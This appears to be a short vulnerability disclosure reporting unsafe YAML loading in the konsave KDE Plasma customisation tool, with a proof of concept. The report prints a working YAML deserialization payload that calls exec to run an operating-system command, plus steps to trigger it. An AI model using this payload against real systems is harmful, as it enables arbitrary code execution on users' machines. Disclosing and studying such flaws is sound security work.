Code Injection in prayag2/konsave

Valid

Reported on

Mar 10th 2021

✍️ Description

konsave is a CLI program that will let you save and apply your KDE Plasma customizations with just one command , which is vulnerable to YAML deserialization attack caused by unsafe loading leads to Arbitary Code Execution.

🕵️‍♂️ Proof of Concept

Installation

pip install konsave

conf.yaml

payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""

now copy conf.yaml and paste in konsave directory
Run the command below
- konsave -s test

This will create a profile along with it code execution will occur

💥 Impact

Arbitary Code Execution

References

https://github.com/Prayag2/konsave
PoC image of the Attack

to join this conversation